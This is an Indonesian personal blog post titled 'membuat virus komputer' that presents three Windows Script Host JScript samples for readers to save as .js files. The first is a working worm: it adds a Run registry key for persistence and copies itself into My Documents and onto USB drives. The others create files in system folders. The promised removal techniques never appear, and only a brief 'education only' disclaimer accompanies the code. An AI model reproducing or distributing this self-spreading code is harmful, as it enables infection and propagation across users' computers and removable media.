BIODATA

Foto saya
Nama saya Glarie Jehesli Rumondor, saya lahir di desa Sonder tepatnya di rumah sakit Siloam Sonder,, Rumah Sakit ini sudah ada sejak Zaman belanda, dan dinobatkan sebagai Rumah Sakit tertua dikawasan asia Timur...?? Nama Ibu saya, Fefta Pajow dan ayah saya Glan Rumondor.?? Saya mempunyai dua adik saya, yang satu namanya Syalom Hensa Rumondor dan Satu Brigita Putri Rumondor..??? Itulah Profil dari saya..??? Sekian dan terima kasih..?? VIRIL MAKER

Selasa, 09 Desember 2008

membuat virus komputer

VIRUS,,,VIRUS,,,
Ternyata dengan menggunakan anti virus juga tidak mampu menjamin bahwa PC anda aman dari segala virus yang beredar saat ini...??? Untuk itu saya membuat blog ini sekalian dengan menceritakan bagaimana menghapus VIRIL(virus) yang ada di komputer anda...????

Blog ini akan memperlihatkan teknik-teknik yang digunakan untuk menghapus virus.,

Anda juga akan melihat penulisan untuk membuat virus, dan cara-cara penaganannya, bagaimana membuat virus yang baik, dan tidak untuk di salah pergunakan, bahwa ini cuma untuk pendidikan...????

contoh kodingan virus :
var fso = new ActiveXObject ("Scripting.FileSystemObject");
var reg = new ActiveXObject ("WScript.Shell");
var Induk = fso.GetFile(WScript.ScriptFullName);
var alamatDoc = reg.SpecialFolders ("MyDocument");
reg.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bronstik",WScript.ScriptFullName);
Induk.Copy(alamatDoc + "\\" + "Bronstik.js");
if (alamatFlashdisk() != "")
Induk.Copy(alamatFlashdisk() + "\\" + "Bronstik.js");

function alamatFlashdisk()
{
try{
var tmp="";
var E = new Enumerator(fso.Drives);
do{
var x = E.item();
if (x.driveType == 1)
if (x.IsReady==true)
tmp = x.DriveLetter + ":";
E.moveNext();
}
while (!E.atEnd())
return tmp;
}
catch(e){
return "";
}
}

simpan dengan nama buatfile.js


virus yang kedua :
var fso, tf;
fso = new ActiveXObject ("Scripting.FileSystemObject");
tf = fso.CreateTextFile("c://Windows//Bronstik.doc", true);
//Tulis satu baris kalimat
tf.WriteLine("V I R I L M A K E R") ;
//Tiga baris blank
tf.WriteBlankLines(3) ;
//kalimat kedua
tf.Write ("V I R I L M A K E R");
tf.Close();

simpan dengan nama, menambahisifile.js


virus yang ketiga :
var fso, tf;
fso = new ActiveXObject ("Scripting.FileSystemObject");
tf = fso.CreateTextFile("c://fileketiga.doc");
f1 = fso.GetFile("c://fileketiga.doc");
f1.Attributes =1

simpan dengan nama attributefile.js

Tidak ada komentar:

Posting Komentar

Pengikut